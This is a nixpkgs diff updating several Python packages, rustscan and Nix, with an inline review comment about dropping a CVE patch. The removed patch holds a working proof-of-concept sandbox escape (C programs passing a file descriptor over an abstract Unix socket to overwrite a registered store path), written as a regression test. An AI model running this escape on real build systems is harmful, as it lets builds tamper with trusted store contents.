-    fastprogress
-    fastcore
-    asttokens
+  nativeBuildInputs = [
+    pythonRelaxDepsHook
+  ];
+
+  pythonRelaxDeps = [
+    "ipywidgets"
+  ];
+
+  build-system = [
+    setuptools
+  ];
+
+  dependencies = [
     astunparse
-    watchdog
     execnb
+    fastcore
     ghapi
+    ipywidgets
     pyyaml
-    quarto
+    watchdog
   ];
 
   # no real tests
diff --git a/pkgs/development/python-modules/nvidia-ml-py/default.nix b/pkgs/development/python-modules/nvidia-ml-py/default.nix
index b5c8f5a53d689..b88947b15c70c 100644
--- a/pkgs/development/python-modules/nvidia-ml-py/default.nix
+++ b/pkgs/development/python-modules/nvidia-ml-py/default.nix
@@ -7,13 +7,13 @@
 
 buildPythonPackage rec {
   pname = "nvidia-ml-py";
-  version = "12.535.133";
+  version = "12.550.52";
   format = "setuptools";
 
   src = fetchPypi {
     inherit pname version;
     extension = "tar.gz";
-    hash = "sha256-sVWa8NV90glVv1jQWv/3sWbd1ElH6zBRyZBWOHmesdw=";
+    hash = "sha256-3+3XFDNccuZaMshun12xzUlSbUTW2McoCdmWlY9zTAc=";
   };
 
   patches = [
diff --git a/pkgs/development/python-modules/papermill/default.nix b/pkgs/development/python-modules/papermill/default.nix
index b419398eef996..743812b84b62a 100644
--- a/pkgs/development/python-modules/papermill/default.nix
+++ b/pkgs/development/python-modules/papermill/default.nix
@@ -1,5 +1,7 @@
 { lib
 , stdenv
+, aiohttp
+, ansicolors
 , azure-datalake-store
 , azure-identity
 , azure-storage-blob
@@ -17,8 +19,8 @@
 , pygithub
 , pytest-mock
 , pytestCheckHook
+, pythonAtLeast
 , pythonOlder
-, pythonRelaxDepsHook
 , pyyaml
 , requests
 , setuptools
@@ -28,7 +30,7 @@
 
 buildPythonPackage rec {
   pname = "papermill";
-  version = "2.5.0";
+  version = "2.6.0";
   pyproject = true;
 
   disabled = pythonOlder "3.8";
@@ -37,19 +39,14 @@ buildPythonPackage rec {
     owner = "nteract";
     repo = "papermill";
     rev = "refs/tags/${version}";
-    hash = "sha256-x6f5hhTdOPDVFiBvRhfrXq1wd5keYiuUshXnT0IkjX0=";
+    hash = "sha256-NxC5+hRDdMCl/7ZIho5ml4hdENrgO+wzi87GRPeMv8Q=";
   };
 
-  pythonRelaxDeps = [
-    "aiohttp"
-  ];
-
-  nativeBuildInputs = [
-    pythonRelaxDepsHook
+  build-system = [
     setuptools
   ];
 
-  propagatedBuildInputs = [
+  dependencies = [
     click
     pyyaml
     nbformat
@@ -58,6 +55,9 @@ buildPythonPackage rec {
     requests
     entrypoints
     tenacity
+    ansicolors
+  ] ++ lib.optionals (pythonAtLeast "3.12") [
+    aiohttp
   ];
 
   passthru.optional-dependencies = {
diff --git a/pkgs/development/python-modules/plotnine/default.nix b/pkgs/development/python-modules/plotnine/default.nix
index a25dcd9125f02..fb86d44472d26 100644
--- a/pkgs/development/python-modules/plotnine/default.nix
+++ b/pkgs/development/python-modules/plotnine/default.nix
@@ -17,7 +17,7 @@
 
 buildPythonPackage rec {
   pname = "plotnine";
-  version = "0.13.4";
+  version = "0.13.5";
   pyproject = true;
 
   disabled = pythonOlder "3.9";
@@ -26,7 +26,7 @@ buildPythonPackage rec {
     owner = "has2k1";
     repo = "plotnine";
     rev = "refs/tags/v${version}";
-    hash = "sha256-ylsaV5yWVbxvD74spAI5tDwIjjue7MOMaGgp4Dc8Nhk=";
+    hash = "sha256-vGxsBcY4CRT4rBUq0AQ4oo0etKK+CtUD487VvnoK/rI=";
   };
 
   postPatch = ''
diff --git a/pkgs/tools/package-management/nix/default.nix b/pkgs/tools/package-management/nix/default.nix
index 4df7399683edf..8833821a9e4d6 100644
--- a/pkgs/tools/package-management/nix/default.nix
+++ b/pkgs/tools/package-management/nix/default.nix
@@ -133,11 +133,10 @@ let
 
 in lib.makeExtensible (self: ({
   nix_2_3 = ((common {
-    version = "2.3.17";
-    hash = "sha256-EK0pgHDekJFqr0oMj+8ANIjq96WPjICe2s0m4xkUdH4=";
+    version = "2.3.18";
+    hash = "sha256-jBz2Ub65eFYG+aWgSI3AJYvLSghio77fWQiIW1svA9U=";
     patches = [
       patch-monitorfdhup
-      ./patches/2_3/CVE-2024-27297.patch
     ];
     maintainers = with lib.maintainers; [ flokli raitobezarius ];
   }).override { boehmgc = boehmgc-nix_2_3; }).overrideAttrs {
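Review bot: The hunk removes `./patches/2_3/CVE-2024-27297.patch` from `nix_2_3` in the same step as the bump to 2.3.18, but nothing in the expression records that the release itself carries the fix, so the change reads as a security patch being dropped. Since `patch-monitorfdhup` stays, add a line next to it such as `# CVE-2024-27297 is fixed upstream as of 2.3.18; no local patch needed` (after confirming against the upstream release notes) so a later reader does not need to dig through history to see why the 2.3 series has no CVE patch while it is still maintained. The `common { … }` call continues outside the hunk.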
@@ -157,8 +156,8 @@ in lib.makeExtensible (self: ({
   };
 
   nix_2_20 = common {
-    version = "2.20.5";
-    hash = "sha256-bfFe38BkoQws7om4gBtBWoNTLkt9piMXdLLoHYl+vBQ=";
+    version = "2.20.6";
+    hash = "sha256-BSl8Jijq1A4n1ToQy0t0jDJCXhJK+w1prL8QMHS5t54=";
   };
 
   nix_2_21 = common {
diff --git a/pkgs/tools/package-management/nix/patches/2_3/CVE-2024-27297.patch b/pkgs/tools/package-management/nix/patches/2_3/CVE-2024-27297.patch
deleted file mode 100644
index b8201cb99ef5c..0000000000000
--- a/pkgs/tools/package-management/nix/patches/2_3/CVE-2024-27297.patch
+++ /dev/null
@@ -1,375 +0,0 @@
-From 9c0be4c156e74a3e7e0d33b04d870642350e72d4 Mon Sep 17 00:00:00 2001
-From: =?UTF-8?q?Th=C3=A9ophane=20Hufschmitt?=
- <theophane.hufschmitt@tweag.io>
-Date: Mon, 12 Feb 2024 21:28:20 +0100
-Subject: [PATCH 1/4] Add a NixOS test for the sandbox escape
-
-Test that we can't leverage abstract unix domain sockets to leak file
-descriptors out of the sandbox and modify the path after it has been
-registered.
----
- release.nix                        |  5 ++
- tests/nixos/ca-fd-leak/default.nix | 93 ++++++++++++++++++++++++++++++
- tests/nixos/ca-fd-leak/sender.c    | 65 +++++++++++++++++++++
- tests/nixos/ca-fd-leak/smuggler.c  | 66 +++++++++++++++++++++
- 4 files changed, 229 insertions(+)
- create mode 100644 tests/nixos/ca-fd-leak/default.nix
- create mode 100644 tests/nixos/ca-fd-leak/sender.c
- create mode 100644 tests/nixos/ca-fd-leak/smuggler.c
-
-diff --git a/release.nix b/release.nix
-index f468946c5..2e71f3796 100644
---- a/release.nix
-+++ b/release.nix
-@@ -235,6 +235,11 @@ let
-       nix = build.x86_64-linux; system = "x86_64-linux";
-     });
- 
-+    tests.ca-fd-leak = (import ./tests/nixos/ca-fd-leak rec {
-+      inherit nixpkgs;
-+      nix = build.x86_64-linux; system = "x86_64-linux";
-+    });
-+
-     tests.setuid = pkgs.lib.genAttrs
-       ["i686-linux" "x86_64-linux"]
-       (system:
-diff --git a/tests/nixos/ca-fd-leak/default.nix b/tests/nixos/ca-fd-leak/default.nix
-new file mode 100644
-index 000000000..c252caa4d
---- /dev/null
-+++ b/tests/nixos/ca-fd-leak/default.nix
-@@ -0,0 +1,93 @@
-+# Nix is a sandboxed build system. But Not everything can be handled inside its
-+# sandbox: Network access is normally blocked off, but to download sources, a
-+# trapdoor has to exist. Nix handles this by having "Fixed-output derivations".
-+# The detail here is not important, but in our case it means that the hash of
-+# the output has to be known beforehand. And if you know that, you get a few
-+# rights: you no longer run inside a special network namespace!
-+#
-+# Now, Linux has a special feature, that not many other unices do: Abstract
-+# unix domain sockets! Not only that, but those are namespaced using the
-+# network namespace! That means that we have a way to create sockets that are
-+# available in every single fixed-output derivation, and also all processes
-+# running on the host machine! Now, this wouldn't be that much of an issue, as,
-+# well, the whole idea is that the output is pure, and all processes in the
-+# sandbox are killed before finalizing the output. What if we didn't need those
-+# processes at all? Unix domain sockets have a semi-known trick: you can pass
-+# file descriptors around!
-+# This makes it possible to exfiltrate a file-descriptor with write access to
-+# $out outside of the sandbox. And that file-descriptor can be used to modify
-+# the contents of the store path after it has been registered.
-+
-+{ nixpkgs, system, nix }:
-+
-+with import (nixpkgs + "/nixos/lib/testing-python.nix") {
-+  inherit system;
-+};
-+
-+let
-+  # Simple C program that sends a a file descriptor to `$out` to a Unix
-+  # domain socket.
-+  # Compiled statically so that we can easily send it to the VM and use it
-+  # inside the build sandbox.
-+  sender = pkgs.runCommandWith {
-+    name = "sender";
-+    stdenv = pkgs.pkgsStatic.stdenv;
-+  } ''
-+    $CC -static -o $out ${./sender.c}
-+  '';
-+
-+  # Okay, so we have a file descriptor shipped out of the FOD now. But the
-+  # Nix store is read-only, right? .. Well, yeah. But this file descriptor
-+  # lives in a mount namespace where it is not! So even when this file exists
-+  # in the actual Nix store, we're capable of just modifying its contents...
-+  smuggler = pkgs.writeCBin "smuggler" (builtins.readFile ./smuggler.c);
-+
-+  # The abstract socket path used to exfiltrate the file descriptor
-+  socketName = "FODSandboxExfiltrationSocket";
-+in
-+makeTest {
-+  name = "ca-fd-leak";
-+
-+  nodes.machine =
-+    { config, lib, pkgs, ... }:
-+    { virtualisation.writableStore = true;
-+      virtualisation.pathsInNixDB = [ pkgs.busybox-sandbox-shell sender smuggler pkgs.socat ];
-+      nix.binaryCaches = [ ];
-+      nix.package = nix;
-+    };
-+
-+  testScript = { nodes }: ''
-+    start_all()
-+
-+    machine.succeed("echo hello")
-+    # Start the smuggler server
-+    machine.succeed("${smuggler}/bin/smuggler ${socketName} >&2 &")
-+
-+    # Build the smuggled derivation.
-+    # This will connect to the smuggler server and send it the file descriptor
-+    machine.succeed(r"""
-+      nix-build -E '
-+        builtins.derivation {
-+          name = "smuggled";
-+          system = builtins.currentSystem;
-+          # look ma, no tricks!
-+          outputHashMode = "flat";
-+          outputHashAlgo = "sha256";
-+          outputHash = builtins.hashString "sha256" "hello, world\n";
-+          builder = "${pkgs.busybox-sandbox-shell}/bin/sh";
-+          args = [ "-c" "echo \"hello, world\" > $out; ''${${sender}} ${socketName}" ];
-+      }'
-+    """.strip())
-+
-+
-+    # Tell the smuggler server that we're done
-+    machine.execute("echo done | ${pkgs.socat}/bin/socat - ABSTRACT-CONNECT:${socketName}")
-+
-+    # Check that the file was modified
-+    machine.succeed(r"""
-+      cat ./result
-+      test "$(cat ./result)" = "hello, world"
-+    """.strip())
-+  '';
-+
-+}
-diff --git a/tests/nixos/ca-fd-leak/sender.c b/tests/nixos/ca-fd-leak/sender.c
-new file mode 100644
-index 000000000..75e54fc8f
---- /dev/null
-+++ b/tests/nixos/ca-fd-leak/sender.c
-@@ -0,0 +1,65 @@
-+#include <sys/socket.h>
-+#include <sys/un.h>
-+#include <stdlib.h>
-+#include <stddef.h>
-+#include <stdio.h>
-+#include <unistd.h>
-+#include <fcntl.h>
-+#include <errno.h>
-+#include <string.h>
-+#include <assert.h>
-+
-+int main(int argc, char **argv) {
-+
-+    assert(argc == 2);
-+
-+    int sock = socket(AF_UNIX, SOCK_STREAM, 0);
-+
-+    // Set up a abstract domain socket path to connect to.
-+    struct sockaddr_un data;
-+    data.sun_family = AF_UNIX;
-+    data.sun_path[0] = 0;
-+    strcpy(data.sun_path + 1, argv[1]);
-+
-+    // Now try to connect, To ensure we work no matter what order we are
-+    // executed in, just busyloop here.
-+    int res = -1;
-+    while (res < 0) {
-+        res = connect(sock, (const struct sockaddr *)&data,
-+            offsetof(struct sockaddr_un, sun_path)
-+              + strlen(argv[1])
-+              + 1);
-+        if (res < 0 && errno != ECONNREFUSED) perror("connect");
-+        if (errno != ECONNREFUSED) break;
-+    }
-+
-+    // Write our message header.
-+    struct msghdr msg = {0};
-+    msg.msg_control = malloc(128);
-+    msg.msg_controllen = 128;
-+
-+    // Write an SCM_RIGHTS message containing the output path.
-+    struct cmsghdr *hdr = CMSG_FIRSTHDR(&msg);
-+    hdr->cmsg_len = CMSG_LEN(sizeof(int));
-+    hdr->cmsg_level = SOL_SOCKET;
-+    hdr->cmsg_type = SCM_RIGHTS;
-+    int fd = open(getenv("out"), O_RDWR | O_CREAT, 0640);
-+    memcpy(CMSG_DATA(hdr), (void *)&fd, sizeof(int));
-+
-+    msg.msg_controllen = CMSG_SPACE(sizeof(int));
-+
-+    // Write a single null byte too.
-+    msg.msg_iov = malloc(sizeof(struct iovec));
-+    msg.msg_iov[0].iov_base = "";
-+    msg.msg_iov[0].iov_len = 1;
-+    msg.msg_iovlen = 1;
-+
-+    // Send it to the othher side of this connection.
-+    res = sendmsg(sock, &msg, 0);
-+    if (res < 0) perror("sendmsg");
-+    int buf;
-+
-+    // Wait for the server to close the socket, implying that it has
-+    // received the commmand.
-+    recv(sock, (void *)&buf, sizeof(int), 0);
-+}
-diff --git a/tests/nixos/ca-fd-leak/smuggler.c b/tests/nixos/ca-fd-leak/smuggler.c
-new file mode 100644
-index 000000000..82acf37e6
---- /dev/null
-+++ b/tests/nixos/ca-fd-leak/smuggler.c
-@@ -0,0 +1,66 @@
-+#include <sys/socket.h>
-+#include <sys/un.h>
-+#include <stdlib.h>
-+#include <stddef.h>
-+#include <stdio.h>
-+#include <unistd.h>
-+#include <assert.h>
-+
-+int main(int argc, char **argv) {
-+
-+    assert(argc == 2);
-+
-+    int sock = socket(AF_UNIX, SOCK_STREAM, 0);
-+
-+    // Bind to the socket.
-+    struct sockaddr_un data;
-+    data.sun_family = AF_UNIX;
-+    data.sun_path[0] = 0;
-+    strcpy(data.sun_path + 1, argv[1]);
-+    int res = bind(sock, (const struct sockaddr *)&data,
-+        offsetof(struct sockaddr_un, sun_path)
-+        + strlen(argv[1])
-+        + 1);
-+    if (res < 0) perror("bind");
-+
-+    res = listen(sock, 1);
-+    if (res < 0) perror("listen");
-+
-+    int smuggling_fd = -1;
-+
-+    // Accept the connection a first time to receive the file descriptor.
-+    fprintf(stderr, "%s\n", "Waiting for the first connection");
-+    int a = accept(sock, 0, 0);
-+    if (a < 0) perror("accept");
-+
-+    struct msghdr msg = {0};
-+    msg.msg_control = malloc(128);
-+    msg.msg_controllen = 128;
-+
-+    // Receive the file descriptor as sent by the smuggler.
-+    recvmsg(a, &msg, 0);
-+
-+    struct cmsghdr *hdr = CMSG_FIRSTHDR(&msg);
-+    while (hdr) {
-+        if (hdr->cmsg_level == SOL_SOCKET
-+          && hdr->cmsg_type == SCM_RIGHTS) {
-+
-+            // Grab the copy of the file descriptor.
-+            memcpy((void *)&smuggling_fd, CMSG_DATA(hdr), sizeof(int));
-+        }
-+
-+        hdr = CMSG_NXTHDR(&msg, hdr);
-+    }
-+    fprintf(stderr, "%s\n", "Got the file descriptor. Now waiting for the second connection");
-+    close(a);
-+
-+    // Wait for a second connection, which will tell us that the build is
-+    // done
-+    a = accept(sock, 0, 0);
-+    fprintf(stderr, "%s\n", "Got a second connection, rewriting the file");
-+    // Write a new content to the file
-+    if (ftruncate(smuggling_fd, 0)) perror("ftruncate");
-+    char * new_content = "Pwned\n";
-+    int written_bytes = write(smuggling_fd, new_content, strlen(new_content));
-+    if (written_bytes != strlen(new_content)) perror("write");
-+}
-
-From 8c27eb6c1bc490c9d2f3c7c1dedb1ca3c8e00759 Mon Sep 17 00:00:00 2001
-From: =?UTF-8?q?Th=C3=A9ophane=20Hufschmitt?=
- <theophane.hufschmitt@tweag.io>
-Date: Tue, 13 Feb 2024 08:28:02 +0100
-Subject: [PATCH 2/4] Copy the output of fixed-output derivations before
- registering them
-
-It is possible to exfiltrate a file descriptor out of the build sandbox
-of FODs, and use it to modify the store path after it has been
-registered.
-To avoid that issue, don't register the output of the build, but a copy
-of it (that will be free of any leaked file descriptor).
----
- src/libstore/build.cc | 11 +++++++++--
- 1 file changed, 9 insertions(+), 2 deletions(-)
-
-diff --git a/src/libstore/build.cc b/src/libstore/build.cc
-index d3a712c1a..3fb827a15 100644
---- a/src/libstore/build.cc
-+++ b/src/libstore/build.cc
-@@ -3286,10 +3286,17 @@ void DerivationGoal::registerOutputs()
-             throw BuildError(format("suspicious ownership or permission on '%1%'; rejecting this build output") % path);
- #endif
- 
--        /* Apply hash rewriting if necessary. */
-+        /* Apply hash rewriting if necessary.
-+         *
-+         * For FODs, we always do the dump-and-restore dance regardless to make
-+         * sure that there's no stale file descriptor pointing to the output
-+         * of the path.
-+         * */
-         bool rewritten = false;
--        if (!outputRewrites.empty()) {
-+        if (fixedOutput || !outputRewrites.empty()) {
-+            if (!outputRewrites.empty()) {
-             printError(format("warning: rewriting hashes in '%1%'; cross fingers") % path);
-+            }
- 
-             /* Canonicalise first.  This ensures that the path we're
-                rewriting doesn't contain a hard link to /etc/shadow or
-
-From 2064277b0566c361339d55fbbf46edbc2519f3b3 Mon Sep 17 00:00:00 2001
-From: =?UTF-8?q?Th=C3=A9ophane=20Hufschmitt?=
- <7226587+thufschmitt@users.noreply.github.com>
-Date: Wed, 21 Feb 2024 17:32:36 +0100
-Subject: [PATCH 3/4] Fix a typo in a test comment
-
-Co-authored-by: Valentin Gagarin <valentin.gagarin@tweag.io>
----
- tests/nixos/ca-fd-leak/default.nix | 2 +-
- 1 file changed, 1 insertion(+), 1 deletion(-)
-
-diff --git a/tests/nixos/ca-fd-leak/default.nix b/tests/nixos/ca-fd-leak/default.nix
-index c252caa4d..2fd5ca2d6 100644
---- a/tests/nixos/ca-fd-leak/default.nix
-+++ b/tests/nixos/ca-fd-leak/default.nix
-@@ -83,7 +83,7 @@ makeTest {
-     # Tell the smuggler server that we're done
-     machine.execute("echo done | ${pkgs.socat}/bin/socat - ABSTRACT-CONNECT:${socketName}")
- 
--    # Check that the file was modified
-+    # Check that the file was not modified
-     machine.succeed(r"""
-       cat ./result
-       test "$(cat ./result)" = "hello, world"
-
-From 8604f6d32976fbdf84e46f75cbfa2446209b8a6b Mon Sep 17 00:00:00 2001
-From: =?UTF-8?q?Th=C3=A9ophane=20Hufschmitt?=
- <theophane.hufschmitt@tweag.io>
-Date: Fri, 1 Mar 2024 09:31:05 +0100
-Subject: [PATCH 4/4] Add release notes
-
----
- doc/manual/rl-next/fod-sandbox-escape.md | 14 ++++++++++++++
- 1 file changed, 14 insertions(+)
- create mode 100644 doc/manual/rl-next/fod-sandbox-escape.md
-
-diff --git a/doc/manual/rl-next/fod-sandbox-escape.md b/doc/manual/rl-next/fod-sandbox-escape.md
-new file mode 100644
-index 000000000..ed451711e
---- /dev/null
-+++ b/doc/manual/rl-next/fod-sandbox-escape.md
-@@ -0,0 +1,14 @@
-+---
-+synopsis: Fix a FOD sandbox escape
-+issues:
-+prs:
-+---
-+
-+Cooperating Nix derivations could send file descriptors to files in the Nix
-+store to each other via Unix domain sockets in the abstract namespace. This
-+allowed one derivation to modify the output of the other derivation, after Nix
-+has registered the path as "valid" and immutable in the Nix database.
-+In particular, this allowed the output of fixed-output derivations to be
-+modified from their expected content.
-+
-+This isn't the case any more.
diff --git a/pkgs/tools/security/rustscan/default.nix b/pkgs/tools/security/rustscan/default.nix
index 5189b7c882b73..238fa8fcc5e33 100644
--- a/pkgs/tools/security/rustscan/default.nix
+++ b/pkgs/tools/security/rustscan/default.nix
@@ -1,37 +1,52 @@
-{ lib, rustPlatform, fetchCrate, nmap, stdenv, Security, perl, python3 }:
+{
+  lib,
+  stdenv,
+  fetchFromGitHub,
+  nmap,
+  perl,
+  python3,
+  rustPlatform,
+  Security,
+}:
 
 rustPlatform.buildRustPackage rec {
   pname = "rustscan";
-  version = "2.1.1";
+  version = "2.2.2";
 
-  src = fetchCrate {
-    inherit pname version;
-    sha256 = "sha256-yGVhbI1LivTIQEgqOK59T1+8SiTJBPIdftiXkwE4lZM=";
+  src = fetchFromGitHub {
+    owner = "RustScan";
+    repo = "RustScan";
+    rev = "refs/tags/${version}";
+    hash = "sha256-67XNEKzR72NOYlPbz2E9yf+THa1XN6muFJG2/iJa8AU=";
   };
 
-  cargoSha256 = "sha256-UR3ktV80QU0N3f7qmqdhYpc5uwoPq4UvN40zEuMbp+Q=";
+  cargoHash = "sha256-U9Kn9xAG+emyi8cWUCNP32z7f19MK8AGgGR6vFJd62Q=";
 
   postPatch = ''
     substituteInPlace src/scripts/mod.rs \
-      --replace 'call_format = "nmap' 'call_format = "${nmap}/bin/nmap'
+      --replace-fail 'call_format = "nmap' 'call_format = "${nmap}/bin/nmap'
     patchShebangs fixtures/.rustscan_scripts/*
   '';
 
   buildInputs = lib.optional stdenv.isDarwin Security;
 
-  nativeCheckInputs = [ perl python3 ];
+  nativeCheckInputs = [
+    perl
+    python3
+  ];
 
-  # these tests require network access
   checkFlags = [
+    # These tests require network access
     "--skip=parse_correct_host_addresses"
     "--skip=parse_hosts_file_and_incorrect_hosts"
   ];
 
   meta = with lib; {
     description = "Faster Nmap Scanning with Rust";
-    mainProgram = "rustscan";
     homepage = "https://github.com/RustScan/RustScan";
+    changelog = "https://github.com/RustScan/RustScan/releases/tag/${version}";
     license = licenses.gpl3Only;
     maintainers = with maintainers; [ figsoda ];
+    mainProgram = "rustscan";
   };
 }